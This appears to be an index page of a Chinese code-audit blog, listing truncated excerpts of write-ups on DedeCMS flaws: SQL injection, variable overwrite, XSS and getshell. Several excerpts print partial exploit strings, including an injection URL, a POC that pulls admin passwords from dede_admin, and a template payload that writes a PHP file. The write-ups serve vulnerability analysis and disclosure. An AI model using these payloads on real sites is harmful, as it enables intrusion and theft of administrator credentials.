实用工具 渗透测试

5
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: EXP: plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000unio......

渗透测试

4
dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦 发表文章处,post表单的mtypesid可以注入 /dedecmsnew/member/album_add.php   注入POC: mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where ......

实用工具

4
轻松无压力,以下结果由【Seay源代码审计系统1.0】自动生成,没有经过人工处理。报告显示效果不好,请点击上面的【全屏阅读】查看     Seay代码审计系统漏洞报告 审计结果:发现可疑漏洞总数:9个 ID 漏洞描述 文件路径 漏洞详细 1 存在敏感信息泄露漏洞 http://localhost/dedecmsgbk///dede/diy_field_edit.php <!DOCTYPE html PUBLIC ̶......

代码审计 实用工具

1
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } ......

代码审计 实用工具

7
今天看到红黑有个文章署名作者是SysShell发的一个这个漏洞(不知道是不是原创),文笔很简洁啊,就给了一个测试的URL,我也很久没写原创文章了,最近一直在写源代码审计系统,预计最迟下周会跟大家见面,目前完成了高精确度自动白盒审计漏洞,代码高亮,漏洞定位,函数/变量列表,代码调试,函数查询,变量/函数追查,自动升级,自定义编辑器,还有很多实用的功能,等出来了大家慢慢玩吧,会首发在www.c......

代码审计 实用工具

6
PS:这个漏洞在上次的 {代码审计:Dedecms 二次注入经典exp构造 原60字符限制突破利用} 文章已经说过了,最初由SafeKey Team的yy520在乌云提到过。     dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss 利用js代码 var request = false;......

代码审计 实用工具

6
0×01 前言       作者:Tycx2ry@SafeKey Team       Long long ago,yy@safekeyer.com发现dedecms二次注入的一个经典代码审计中二次攻击的案例,但限于字段大小不能超过60字节而显得比较鸡肋,在safekeyer集体的智慧之下发现两种突破办法。    此文重在exp的构造,如需详细漏洞分析,请看:http://www.wooy......

代码审计 实用工具

16
 晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯) 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里,估计这两个文件是临时工写的。 Include/payment/alipay.php ...... function respon......

代码审计 实用工具

0
  漏洞文件:/plus/feedback.php   if($comtype == 'comments') //问题从这里开始 { $arctitle = addslashes($title);//$title 是关键 没有初始化 addslashes转义了我们的$title 比如我们传入1' $arctitle=1\' $typeid = intval($typeid); //这些都是打酱油的 $ischeck = intval($ischeck);//这些都是打酱油的 $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype......

代码审计 实用工具

0
在 include/shopcar.class.php中 先看一下这个shopcar类是如何生成cookie的 239 function saveCookie($key,$value) 240 { 241 if(is_array($value)) 242 { 243 $value = $this->enCrypt($this->enCode($value)); 244 } 245 else 246 { 247 $value = $this->enCrypt($value); 248 ......

代码审计 实用工具

代码审计:dedecms(织梦)鸡肋getshell 漏洞

发表于4年前 | 作者: seay

0
gpc off 的getshell /member/soft_add.php 156 if($softurl1!='') 157 { 158 $urls .= "{dede:link islocal='1' text='{$servermsg1}'} $softurl1 {/dede:link}\r\n"; 159 } 其中的$servermsg1毫无过滤的进入了$url中 构造好$servermsg1=’}x{/dede:link}{dede:yy520 name\=”‘]=0;fputs(fopen(‘2.php’,’w’),’justfor......

代码审计 实用工具

1
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. 作者: c4rp3nt3r@0x50sec.org Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. 黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧. ============ Dedecms最新版 plus/search.p......

代码审计

2
漏洞发现者:c4rp3nt3r 本站漏洞相关链接http://www.cnseay.com/archives/1954 漏洞分析: 在文件member \\flink_main.php 文件55行中: else if($dopost==”update”) {     AjaxHead();     $aid = intval($aid);     if(!preg_match(“#^http:\/\/#”, $url)) $url = “http://”.HtmlReplace($url,2);       $title = HtmlReplace($title);     $upquery = R......

实用工具

3
作者: c4rp3nt3r@0x50sec.org 2012-11-28 主页: http://www.0x50sec.org/ 严重鄙视乱改内容转载的网站. DedeCMS会员中心SQL注射漏洞 需要magic_quotes_gpc = Off 会员登录后可以执行SQL语句查询数据库任意内容如管理员密码. DedeCMS会员中心书签管理SQL注射漏洞 成功利用该漏洞可获得管理员密码 会员登录后可以执行SQL语句查询数据库任意内容如管理员密码 http://bt/member/flink_main.php?dopost=updat......